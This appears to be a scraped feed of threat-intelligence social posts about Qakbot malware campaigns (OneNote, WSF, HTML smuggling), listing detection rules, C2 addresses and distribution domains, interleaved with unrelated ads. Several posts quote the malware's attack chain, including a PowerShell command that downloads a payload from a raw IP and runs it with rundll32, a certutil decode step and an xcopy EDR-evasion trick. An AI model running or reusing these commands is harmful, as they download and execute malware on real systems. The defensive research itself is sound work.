Here's my blog on #Qakbot malware with threat detections using #osquery

Qakbot seen in below campaigns:
⛔️OneNote Campaign
⛔️WSF Campaign
⛔️HTML Smuggling Campaign

Blog: research.loginsoft.com/threat-researc…

#threatintelligence #malware #threathunting #DFIR

I recently executed 100+ #Qakbot samples

🧵for some insights

OneNote Malware Campaign Insights
Malware List:
1️⃣ Qakbot
2️⃣ Emotet
3️⃣ AgentTesla
4️⃣ IcedID
...
research.loginsoft.com/threat-researc…
#ThreatIntelligence #malware #onenote #infosec

A highlevel overview on the recent Qakbot BB26 malware campaign

#Qakbot HTA dropped by OneNote today. Writes JScript code to HKCU\SOFTWARE\Firm\Soft\Name

More #qakbot spreading via #OneNote 🦆
Registry: HKCU\\SOFTWARE\\anna\\nana\\nina
DLL execution: C:\\ProgramData\\1.png,Wind
Payload URL: hxxps://khatriassociates.com/MBt/3.gif
eSentire Threat Intel

We've updated the vx-underground malware sample collection.

- NokoyaRansomware
- QakBot
- Karma
- Conti
- Pysa
- LokiBot
- Industroyer
- PryntStealer
- BlackGuard
- Redline
- Certishell
- Emotet

Check it out here: samples.vx-underground.org/samples/Famili…

CrowBot Bolt: The Ultimate Esp32 Robot Car to learn programming fun 🔥

#Qakbot Nasty Tricks #TTPs Attempt to Bypass EDRs

[+] Multiply path escapes avoiding command-line detections:
xcopy C:\Windows\\\\\\system32\\\\\\wscript.exe %temp%\{*}.exe /h /s /e

[+] Masquerading:
Rename System Utilities T1036.003
Match Legitimate Name or Location T1036.005

QQQE - Are you getting 100% of the NASDAQ-100? Here's how. Learn more about the QQQE ETF from Direxion.

Sharing a quick #Sigma Rule for detecting related #Qakbot activity.

Github Link:
github.com/embee-research…

#Sigma #qakbot #detection

🔥 Daily Indicators of Compromise ( #IoC ) are now available on the MalwareHunters.org platform in JSON and XLSX formats in the section with digital profiles of #malware , #cybercrime and #APT groups

📌 #QakBot digital profile (example)

malwarehunters.org/infographics/m…

#iocs #infosec

Write in clear, mistake-free English with QuillBot.

Join over 50+ million QuillBot users and see what better, clearer writing can do for you.

Try for Free Now!

Renamed Windows Binaries in today's #qakbot :
- cmd.exe
- wscript.exe
- reg.exe

B64 encoded PS includes exclusion for $currentdrive
Lots of #defenseevasion tactics in the beginning of the attack chain.

.FortiGuard Labs discovered a #phishing campaign spreading a new variant of the information stealer and banking Trojan #QakBot .

Read our analysis blog to learn how the HTML file can lead to executing the QakBot variant, what actions it takes, and more: ftnt.net/6018PEE78

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll

WScript.exe Open.jse

cmd.exe /c default.bat

powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp

RunDLL32 %temp%\aTgzWLspf.tmp,Wind

IOC's
github.com/pr0xylife/Qakb…

(Unverified) Qakbot Found
C2: 81[.]150[.]169[.]174:2222
Country: United Kingdom (AS2856)
ASN: BT-UK-AS BTnet UK Regional network

#c2 #Qakbot #unverified

Looks like #qakbot using renamed certutil to decode a text file to create the dll before running it.

zip ➡️ iso (~203MB) ➡️ cmd ➡️\vibrations\quitting.exe (certutil) -decode vibrations\competitively.sql c:\users\public\output2.txt ➡️rundll32 c:\users\public\output2.txt,N115

(Unverified) Qakbot Found
C2: 105[.]157[.]111[.]71:443
Country: Morocco (AS36903)
ASN: MT-MPLS

#c2 #Qakbot #unverified

#QakBot devs got drunk.
A sample with malfunction powershell script , they tried to apply split on unsplitted fetching URL's 🤣

Triage:
tria.ge/230322-v3x72aa…

Interesting fresh #Qakbot sample with lots of log messages. Version 404.447, campaign BB12, timestamp 2023-02-02 08:21:43.

virustotal.com/gui/file/232ec…

Malware Hunters ∘ QakBot malwarehunters.org/infographics/m…

(Unverified) Qakbot Found
C2: 184[.]82[.]228[.]178:443
Country: Thailand (AS133481)
ASN: AIS-FIBRE-AS-AP AIS Fibre

#c2 #Qakbot #unverified

Some #Qakbot 🏹 hunting tips 🏹...

🧵

#QakBot Obama DLL distribution domains deployed last week but as yet, unused. You know what to do.

wewesuga[.]com
weswtef[.]com
utokra[.]com
ilapset[.]com
fikqso[.]com
deracak[.]com